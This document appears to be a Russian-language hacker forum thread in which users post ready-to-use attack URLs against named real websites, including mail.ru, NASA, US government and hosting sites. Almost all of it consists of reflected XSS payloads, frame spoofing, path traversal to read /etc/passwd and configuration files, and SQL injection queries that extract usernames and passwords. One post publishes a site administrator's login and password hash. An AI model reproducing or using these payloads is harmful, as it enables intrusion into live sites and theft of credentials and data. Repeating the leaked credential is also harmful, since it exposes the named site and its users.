XSS на go.mail.ru Не фильтруется: surl.. Code: http://go.mail.ru/search?lfilter=y&q=%25CF%25F1%25E8%25F5%25EE%25EB%25EE%25E3%25E8%25FF%2B%25F1%25EE%25E1%25E0%25EA%2B%253C%253C%2Burl%253D%2522www%2Edogcatalog%2Enet%252F%2A%2522&num=10&as_q=1&old_q=%25F1%25E0%25E9%25F2%25EE%25E2%2B%25F1%25EE%25E7%25E4%25E0%25ED%25E8%25E5&surl=<script>alert('XSS')%3B</script> Не фильтруется: id, iid, pageurl. Code: http://go.mail.ru/frame.html?imgurl=http%3A%2F%2Fphoto-report%2Enight%2Eru%2Fimg%2Fnight-345%2Ejpg&pageurl="><script>alert('XSS')%3B</script>&id=7908229&iid=3&imgwidth=300&imgheight=188&imgsize=21562&images_links=b Не фильтруется: id, imgurl, iid, pageurl. Code: http://go.mail.ru/details.html?imgurl=http%253A%252F%252Fwww%2Etonnel%2Eru%252Ffonoteka%252Fispol%252F576227168_tonnel%2Egif&id="><script>alert('XSS')%3B</script>&iid=2&pageurl=http%253A%252F%252Fwww%2Etonnel%2Eru%252F%253Fl%253Dfonoteka%2526main%253D33&imgheight=421&imgwidth=300&ref=1&links=1&imgsize=9025 Подмена фрейма. Code: http://go.mail.ru/frame.html?imgurl=http%3A%2F%2Fphoto-report%2Enight%2Eru%2Fimg%2Fnight-345%2Ejpg&pageurl=http://www.antichat.ru/&id=7908229&iid=3&imgwidth=300&imgheight=188&imgsize=21562&images_links=b
Пиво Buckler - buckler.ru http://www.buckler.ru/down.php?file=../inc/connect.php http://www.buckler.ru/down.php?file=../../../../../../../../etc/passwd
И ещё xss на nasa, лолики они _http://search.nasa.gov/nasasearch/search/advSearch.jsp?nasaInclude=%3CIMG+SRC%3D%60javascript%3Aalert%28%22slip%3A%27NASA+LOL%27%22%29%60%3E&qt=all&qx=&qm=anywhere&dct=Any+Type&dn=&dt=at&recPerPg=10&displayFormat=detail&sortBy=Scoredesc
еще mail.ru _http://astral.mail.ru/numer.php?mode=9&cnum=&fio="><script>alert(1)</script>&afio=test _http://astral.mail.ru/sin.php?month=11&year=2005&month1=12&year1=2003<script>alert(document.cookie)</script>
_http://vidahl.agava.ru/cgi-bin/dic.cgi?search=%3Cscript%3Ealert%28%2Fslip%2F%29%3C%2Fscript%3E&method=exact _http://www.sabrina.ru/search.php?action=shared_simple&bigboss=l_0&search_kind=and&action=shared_simple&phrase=%3Cscript%3Ealert%28%2Fslip%2F%29%3C%2Fscript%3E&B1= _http://goohoo.ru/search.bat?w=referats&q=%3Cscript%3Ealert%28%2Fslip%2F%29%3C%2Fscript%3E
[.GOV] _http://fedbbs.access.gpo.gov/library/view/lib/?lib=%3Cscript%3Ealert('a1ien')%3C/script%3E _http://www.weather.gov/glossary/index.php?letter=%3Cscript%3Ealert(/a1ien/)%3C/script%3E _http://allard.senate.gov/public/index.cfm?FuseAction=Polls.Results&PollsPoll_id=16'&IsPopUp=True
Очень интересная вещь _http://referat.kulichki.net/cgi-bin/refsearch/search.cgi?query=%3Cscript%3Ealert%28%2F[sL1p]%2F%29 %3C%2Fscript%3E&bool=or PS Что бы всё нормально работало, уберите пробел между: ...2Fslip%2F%29 %3C%2Fscript%...
_http://www.rbsearch.ru/search.php?best=0&said=rbs_210&qq=%3Cscript%3Ealert%28%2F%5BsL1p%5D%2F%29%3C%2Fscript%3E&Submit2=%C8%F1%EA%E0%F2%FC
forum.fozya.com - туса педофилов _http://www.fozya.com/anecdot.php?view=all&n=1-100&category=19999+UNION+SELECT+0,0,user_password,0,0,0,username+FROM+phpbb_users+LIMIT+0,10/* детей жалко. Сочувствующие приймите меры. админ: Fozya:67bf9ec4b550e0a91bc8f2ecb0ceb0dc пароль он может уже поменял (я там поучил их жизни )
VALUEHOST.RU _http://www.valuehost.ru/signup/?sg=1+union+select+1,2,user,password,5,6,7,8,9,10+from+mysql.user/* ВНИМАНИЕ!!! Защищено от киддисов.
_http://www.pci.ru/index2.php?PHPSESSID=71b154d4e17f24558d92e1033fddf37c&action=search&fr_name=%3Cscript%3Econfirm%28%29%3C%2Fscript%3E%3Ch1%3EV+test%3C%2Fh1%3E
еще один ХОСТИНГ http://yard.ru скул http://yard.ru/members бага в поле Login ставим ковычку и наблюдаем
http://www.youtube.com/watch?v=JFIrcev6Lh4&search=macbook%20apple%20bootcamp%20laptop%2'0hardware http://www.sela.ru/catalog/allmodel.php?pol=6&gr1=47&gr2=23'2&col=
На главной странице _http://www.westbyte.com/index.phtml?lng=Russian"><script>alert(/[sL1p]/)</script> _http://www.qmp3.ru/search.php?string=http%3A%2F%2Fwww.westbyte.com%2Findex.phtml%3Flng%3DRussian%22%3E%3Cscript%3Ealert%28%2F%5BsL1p%5D%2F%29%3C%2Fscript%3E&st=all _http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd
